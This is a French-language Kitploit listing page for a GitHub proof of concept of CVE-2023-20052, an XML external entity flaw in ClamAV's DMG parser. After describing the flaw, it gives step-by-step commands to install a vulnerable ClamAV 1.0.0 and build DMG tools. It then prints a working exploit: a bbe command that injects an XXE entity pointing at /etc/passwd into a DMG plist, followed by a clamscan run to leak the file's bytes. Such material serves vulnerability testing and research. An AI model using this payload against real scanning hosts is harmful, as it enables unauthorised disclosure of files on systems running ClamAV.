Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-20052 — CVE-2023-20052 vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV | Kitploit
Outils/GitHubGitHub/cy83rr0h1t/cve-2023-20052
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsAnalyse de Malware
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 vulnérabilité de fuite d'informations dans l'analyseur de fichiers DMG de ClamAV

Voir le dépôt
13il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-20052

Vulnérabilité de fuite d'informations CVE-2023-20052 dans l'analyseur de fichiers DMG de ClamAV
Une vulnérabilité dans l'analyseur de fichiers DMG de ClamAV versions 1.0.0 et antérieures, 0.105.1 et antérieures, et 0.103.7 et antérieures pourrait permettre à un attaquant distant non authentifié d'accéder à des informations sensibles sur un appareil affecté. Cette vulnérabilité est due à l'activation de la substitution d'entités XML pouvant entraîner une injection d'entité externe XML. Un attaquant pourrait exploiter cette vulnérabilité en soumettant un fichier DMG conçu pour être analysé par ClamAV sur un appareil affecté. Une exploitation réussie pourrait permettre à l'attaquant de divulguer des octets de tout fichier pouvant être lu par le processus d'analyse de ClamAV.

Testé sur Ubuntu 20.04

Comment installer ClamAV version 1.0.0

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

Installation de quelques éléments supplémentaires nécessaires pour cet exploit.

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

Référence : https://github.com/nokn0wthing/CVE-2023-20052

Télécharger l’outil